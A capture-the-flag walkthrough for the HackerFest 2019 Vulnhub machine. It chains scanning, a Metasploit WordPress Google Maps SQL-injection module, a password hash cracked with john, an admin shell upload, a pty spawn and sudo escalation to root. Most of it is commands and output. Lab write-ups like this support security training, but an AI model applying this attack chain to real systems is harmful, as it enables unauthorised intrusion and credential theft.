Vulnhub Link: https://download.vulnhub.com/hackerfest/HF2019-Linux.ova

root@kali:~# nmap -A

port : 21 , 22 , 80 , 10000

Enumeration :

now on terminal

root@kali:~# wpscan –url

WordPress Google maps Sqli Exploit :

msf5 > use auxiliary/admin/http/wp google_maps_sqli
msf5 auxiliary(admin/http/wp_google_maps_sqli) > set rhosts
msf5 auxiliary(admin/http/wp_google_maps_sqli) > exploit

we get the output

webmaster $P$Bsq0diLTcye6ASlofreys4GzRlRvSrl

root@kali:~# gedit hash

webmaster $P$Bsq0diLTcye6ASlofreys4GzRlRvSrl

save it

root@kali:~# john –wordlist=/usr/share/wordlists/rockyou.txt hash

output : kittykat1

on another terminal

msf5 > use exploit/unix/webapp/wp_admin_shell_upload

msf5 exploit(unix/webapp/wp_admin_shell_upload) > set rhosts

msf5 exploit(unix/webapp/wp_admin_shell_upload) > set username webmaster

msf5 exploit(unix/webapp/wp_admin_shell_upload) > set password kittykat1

msf5 exploit(unix/webapp/wp_admin_shell_upload) > exploit

meterpreter > shell

python -c ‘import pty;pty.spawn(“/bin/bash”)’

www-data@HF20196-Linux:$ su webmaster
Password: kittykat1

webmaster@HF2019-Linux:$ sudo -l

password : kittykat1

webmaster@HF2019-Linux:$ sudo su

root@HF2019-Linux:~# cat flag.txt


Related Posts


Leave a Reply

Your email address will not be published. Required fields are marked *